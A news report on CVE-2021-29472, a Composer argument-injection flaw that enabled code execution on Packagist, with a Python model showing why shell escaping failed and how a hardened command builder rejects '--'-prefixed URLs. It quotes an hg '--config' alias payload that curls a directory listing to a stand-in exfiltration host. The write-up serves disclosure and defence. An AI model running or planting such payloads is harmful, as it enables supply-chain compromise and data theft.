Vulnerability in the Composer package manager that allows the Packagist PHP repository to be compromised

A critical vulnerability (CVE-2021-29472) has been identified in the Composer dependency manager that allows arbitrary commands to be executed on the system when processing a package whose URL value, the address from which the source code is to be fetched, is specially crafted. The problem lies in the GitDriver, SvnDriver and HgDriver components used when working with the Git, Subversion and Mercurial source control systems. The vulnerability is fixed in Composer releases 1.10.22 and 2.0.13.

Notably, the problem mainly affected Composer's default package repository, Packagist, which hosts 306 thousand packages from PHP developers and serves more than 1.4 billion downloads per month. Testing showed that an attacker who knew about the problem could take control of the Packagist infrastructure and from there intercept maintainers' credentials or redirect package downloads to a third-party server, arranging for a different package build with malicious changes to be delivered and a backdoor to be planted during dependency installation.

The risk to end users is limited by the fact that the contents of composer.json are normally controlled by the user, and source links are only passed when accessing third-party repositories, which are usually trusted. The main impact falls on the Packagist.org repository and the Private Packagist service, which invoke Composer with data received from users. An attacker could execute their own code on the Packagist servers by submitting a specially crafted package.

The Packagist team fixed the vulnerability within 12 hours of it being reported. The researchers privately notified the Packagist developers on April 22, and the problem was fixed the same day. A public Composer update addressing the vulnerability was published on April 27, with details disclosed on April 28. A review of the logs on the Packagist servers did not reveal any suspicious activity related to the vulnerability.

The problem is caused by a flaw in the URL validation code for the root composer.json file and for the source download links. The flaw had been present in the code since November 2011. Composer uses driver layers to arrange code retrieval without being tied to a particular source control system; they are implemented by calling "fromShellCommandline" and passing command-line arguments. For example, for git the command "git ls-remote --heads $URL" is run, where the URL is first processed with the "ProcessExecutor::escape($url)" method, which escapes potentially dangerous shell constructs such as "$(...)" or "`...`".

The crux of the problem is that the ProcessExecutor::escape method did not treat a leading "--" as dangerous, so a URL beginning with "--" was handed to the VCS tool as an additional command-line option. Shell escaping protects the shell, not the argument parser of the program being invoked, and no guard against option-like values existed in GitDriver.php, SvnDriver.php or HgDriver.php. An attack on GitDriver.php was hampered by the fact that "git ls-remote" does not accept further options after the path. An attack on HgDriver.php was possible by passing the "--config" option to the "hg" utility, which allows execution of an arbitrary command by overriding the "alias.identify" setting (the driver runs "hg identify" against the URL, so the alias replaces that subcommand). For example, to fetch and run code with the curl utility, one could supply the following as the URL:
--config=alias.identify=!curl http://exfiltration-host.tld --data "$(ls -alh)"
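The following Python model shows why shell escaping alone did not help in the HgDriver case, and what a hardened command builder looks like. It is an added illustration, not Composer's code and not the researchers' proof of concept. It assumes a toy hg option parser (parse_hg_argv) that only approximates the real hg behaviour: "--" ends option parsing, and "--config" takes a "section.name=value" argument. The payload and host name are the ones quoted above; the benign URL is constructed for the example.

```python
"""Argument injection through a URL that begins with '--'.

Added illustration, not Composer's code. The URL is shell-escaped, but
the escaped value still reaches `hg identify` as one argv element, and
hg parses anything beginning with '-' as an option. parse_hg_argv is a
deliberate simplification of hg's option parser (assumption).
"""
import shlex
from typing import Dict, List


class UnsafeUrl(ValueError):
    """Raised by the hardened builder when a URL could be read as an option."""


def vulnerable_command(url: str) -> str:
    # Pre-fix shape: the URL is quoted for the shell only.
    # shlex.quote neutralises $(...) and backticks for *this* shell, but a
    # leading '--config=' survives intact and is interpreted by hg itself.
    return "hg identify " + shlex.quote(url)


def separator_only_command(url: str) -> str:
    # Defence 1: '--' tells hg that everything after it is positional.
    return "hg identify -- " + shlex.quote(url)


def hardened_command(url: str) -> str:
    # Defence 2 on top of defence 1: reject option-like or unexpected URLs
    # before they ever reach a subprocess. Scheme list is an assumption.
    if url.startswith("-"):
        raise UnsafeUrl(f"refusing URL that starts with '-': {url!r}")
    if not url.startswith(("http://", "https://", "ssh://", "file://")):
        raise UnsafeUrl(f"unsupported scheme: {url!r}")
    return separator_only_command(url)


def is_rejected(url: str) -> bool:
    """True when hardened_command refuses the URL."""
    try:
        hardened_command(url)
    except UnsafeUrl:
        return True
    return False


def parse_hg_argv(argv: List[str]) -> Dict[str, List[str]]:
    """Toy model of how hg splits argv into --config values and positionals."""
    config: List[str] = []
    positional: List[str] = []
    parsing_opts = True
    i = 0
    while i < len(argv):
        arg = argv[i]
        if parsing_opts and arg == "--":
            parsing_opts = False
        elif parsing_opts and arg.startswith("--config="):
            config.append(arg[len("--config="):])
        elif parsing_opts and arg == "--config":
            i += 1
            config.append(argv[i])
        else:
            positional.append(arg)
        i += 1
    return {"config": config, "positional": positional}


def simulate(command: str) -> Dict[str, List[str]]:
    """Split the command the way /bin/sh would, then hand argv to the toy hg."""
    argv = shlex.split(command)
    assert argv[:2] == ["hg", "identify"]
    return parse_hg_argv(argv[2:])


# Payload quoted in the article: the whole string becomes one argv element.
# hg would store the value under alias.identify and, on running "identify",
# execute the '!' alias through a *second* shell, where $(ls -alh) expands.
PAYLOAD = '--config=alias.identify=!curl http://exfiltration-host.tld --data "$(ls -alh)"'
BENIGN_URL = "https://hg.example.test/repo"  # constructed for the example


if __name__ == "__main__":
    print("vulnerable :", simulate(vulnerable_command(PAYLOAD)))
    print("separator  :", simulate(separator_only_command(PAYLOAD)))
    print("hardened   :", "rejected" if is_rejected(PAYLOAD) else "accepted")
    print("benign     :", simulate(hardened_command(BENIGN_URL)))
```

The separator alone already turns the payload into a harmless positional argument, but the up-front check is worth keeping: not every tool honours "--" for every subcommand, and a URL that begins with "-" has no legitimate use here anyway.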

By submitting a test package with such a URL to Packagist, the researchers confirmed that shortly after submission their server received an HTTP request from one of the Packagist servers hosted on AWS, containing a listing of the files in the current directory.

Source: opennet.ru
